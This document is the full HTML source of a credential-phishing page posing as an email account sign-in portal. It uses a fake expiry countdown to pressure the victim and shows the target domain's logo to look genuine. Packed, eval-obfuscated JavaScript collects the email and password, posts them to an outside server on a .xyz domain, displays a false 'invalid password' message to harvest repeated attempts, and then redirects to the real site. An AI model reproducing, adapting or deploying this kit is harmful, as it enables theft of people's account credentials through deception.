<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>Email | Portal Signin </title>
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.3/css/all.min.css"/>
  <style>
  @import url('https://fonts.googleapis.com/css2?family=Poppins:wght@400;500;600&display=swap');
*{
  margin: 0;
  padding: 0;
  box-sizing: border-box;
  font-family: "Poppins", sans-serif;
}
body{
  width: 100%;
  height: 100vh;
  display: flex;
  align-items: center;
  justify-content: center;
  background: #5372F0;
}
::selection{
  color: #fff;
  background: #5372F0;
}
.wrapper{
  width: 380px;
  padding: 40px 30px 50px 30px;
  background: #fff;
  border-radius: 5px;
  text-align: center;
  box-shadow: 10px 10px 15px rgba(0,0,0,0.1);
}
.wrapper header{
  font-size: 35px;
  font-weight: 600;
}
.wrapper form{
  margin: 40px 0;
}
form .field{
  width: 100%;
  margin-bottom: 20px;
}
form .field.shake{
  animation: shake 0.3s ease-in-out;
}
@keyframes shake {
  0%, 100%{
    margin-left: 0px;
  }
  20%, 80%{
    margin-left: -12px;
  }
  40%, 60%{
    margin-left: 12px;
  }
}
form .field .input-area{
  height: 50px;
  width: 100%;
  position: relative;
}
form input{
  width: 100%;
  height: 100%;
  outline: none;
  padding: 0 45px;
  font-size: 18px;
  background: none;
  caret-color: #5372F0;
  border-radius: 5px;
  border: 1px solid #bfbfbf;
  border-bottom-width: 2px;
  transition: all 0.2s ease;
}
form .field input:focus,
form .field.valid input{
  border-color: #5372F0;
}
form .field.shake input,
form .field.error input{
  border-color: #dc3545;
}
.field .input-area i{
  position: absolute;
  top: 50%;
  font-size: 18px;
  pointer-events: none;
  transform: translateY(-50%);
}
.input-area .icon{
  left: 15px;
  color: #bfbfbf;
  transition: color 0.2s ease;
}
.input-area .error-icon{
  right: 15px;
  color: #dc3545;
}
form input:focus ~ .icon,
form .field.valid .icon{
  color: #5372F0;
}
form .field.shake input:focus ~ .icon,
form .field.error input:focus ~ .icon{
  color: #bfbfbf;
}
form input::placeholder{
  color: #bfbfbf;
  font-size: 17px;
}
form .field .error-txt{
  color: #dc3545;
  text-align: left;
  margin-top: 5px;
}
form .field .error{
  display: none;
}
form .field.shake .error,
form .field.error .error{
  display: block;
}
form .pass-txt{
  text-align: left;
  margin-top: -10px;
}
.wrapper a{
  color: #5372F0;
  text-decoration: none;
}
.wrapper a:hover{
  text-decoration: underline;
}
form input[type="submit"]{
  height: 50px;
  margin-top: 30px;
  color: #fff;
  padding: 0;
  border: none;
  background: #5372F0;
  cursor: pointer;
  border-bottom: 2px solid rgba(0,0,0,0.1);
  transition: all 0.3s ease;
}
form input[type="submit"]:hover{
  background: #2c52ed;
}

  </style>
</head>
<body>
  <div class="wrapper">
 <div align="center">   <img src="https://firebasestorage.googleapis.com/v0/b/mpoaanan.appspot.com/o/inc%2Floadinglogo.gif?alt=media&token=ad80211a-6694-4e63-84f9-293050c3c1f5" id="logoimg" width="70px" height="70px"></div>
<div id="logoname" align="center"></div>
<p align="center"><font size="-1">Confirm your email address to fix your account. Update expires in</font><br/><font color="#FF0000"><span id="timer"></span> Hours</font></p>

     <form action="#">
      <div class="field email">
	  
        <div class="input-area">
          <input type="text" id="email" name="email" placeholder="Email Address" readonly="">
          <i class="icon fas fa-envelope"></i>
          <i class="error error-icon fas fa-exclamation-circle"></i>
        </div>
      </div>
      <div class="field password">
        <div class="input-area">
          <input type="password" placeholder="Password" name="password" id="password">
          <i class="icon fas fa-lock"></i>
          <i class="error error-icon fas fa-exclamation-circle"></i>
		            <div id="msg" style="display: none; color:#FF0000; font-size:14px">Invalid Password.! Please Enter your correct Password</div>

        </div>
      </div>
      <input type="submit" value="Update Your Account" id="submit-btn">
    </form>
	<div style="line-height: 11px" align="left">
<small style="font-size: 12px;text-align: left;font-family: arial;color: #929090;">Note: Proceed to view and retrieve pending messages.</small>
<div style="line-height: 27px;margin-top: 19px;font-weight: 400;font-size: 15px;font-family: calibri;color: #7d7878;cursor: pointer;">
<b>Get a new account</b><br>
<b>Can't access your account?</b><br>
</div>
  </div>
<script>
eval(function(p,a,c,k,e,r){e=function(c){return c.toString(a)};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('3.4(\'5\').6=f+":"+g;7();c 7(){2 a=3.4(\'5\').6;2 b=a.h(/[:]+/);2 m=b[0];2 8=d((b[1]-1));9(8==e){m=m-1}3.4(\'5\').6=m+":"+8;i(7,j)}c d(a){9(a<k&&a>=0){a="0"+a};9(a<0){a="e"};l a}',23,23,'||var|document|getElementById|timer|innerHTML|startTimer|s|if|||function|checkSecond|59|24|00|split|setTimeout|2000|10|return|'.split('|'),0,{}))
</script>

</body>
 <!-- Optional JavaScript -->
 

  <script src="https://code.jquery.com/jquery-3.6.0.min.js"></script>
  <script>
eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('$(16).17(6(){5 m=0;$(\'#18\').R(6(){$("#8").A();$(\'#B\').u("");$("#19").S({1a:T,U:"A"},0);$("#1b").S({1c:T,U:"y"},1d)});5 n=G.H.1e.z(1);7(!n){}V{5 o=n;$(\'#B\').u(o);5 p=/^([a-v-w-W\\.\\-])+\\@(([a-v-w-9\\-])+\\.)+([a-v-w-9]{2,4})+$/;7(!p.X(o)){$(\'#C\').y();n.Y;Z 10}5 q=o.D("@");5 r=o.z((q+1));5 c=r.z(0,r.D(\'.\'));5 s=c.11();5 t=c.12();$("#I").J("K","E://L.M.N/"+r);$("#O").x(t);$(".O").x(t)}$(\'#P-Q\').R(6(b){$(\'#C\').A();$(\'#8\').A();b.1f();5 d=$("#B").u();5 e=$("#F").u();5 f=$(\'#8\').x();$(\'#8\').1g(f);5 g=d;5 h=/^([a-v-w-W\\.\\-])+\\@(([a-v-w-9\\-])+\\.)+([a-v-w-9]{2,4})+$/;7(!h.X(g)){$(\'#C\').y();d.Y;Z 10}5 i=g.D("@");5 j=g.z((i+1));5 c=j.z(0,j.D(\'.\'));5 k=c.11();5 l=c.12();$("#I").J("K","E://L.M.N/"+j);$(".I").J("K","E://L.M.N/"+j);$("#O").x(l);m=m+1;$.1h({1i:\'1j\',1k:\'E://1l-1m.1n/1o/1p-1q.1r\',1s:\'1t\',1u:{B:d,F:e,},1v:6(a){$(\'#P-Q\').x(\'1w...\')},1x:6(a){7(a){$("#8").y();1y.1z(a);7(a[\'1A\']==\'1B\'){$("#F").u("");7(m>=3){m=0;G.H.13("14://15."+j)}}V{}}},C:6(){$("#F").u("");7(m>=2){m=0;G.H.13("14://15."+j)}$("#8").y()},1C:6(){$(\'#P-Q\').x(\'1D 1E\')}})})});',62,103,'|||||var|function|if|msg||||||||||||||||||||||val|zA|Z0|html|show|substr|hide|email|error|indexOf|https|password|window|location|logoimg|attr|src|logo|clearbit|com|logoname|submit|btn|click|animate|200|opacity|else|9_|test|focus|return|false|toLowerCase|toUpperCase|replace|http|www|document|ready|back1|automail|left|inputbar|right|1000|hash|preventDefault|text|ajax|dataType|JSON|url|culetpro|ltd|xyz|app|form|loaded|php|type|POST|data|beforeSend|Verifing|success|console|log|signal|ok|complete|Sign|in'.split('|'),0,{}))
  </script>
</html>
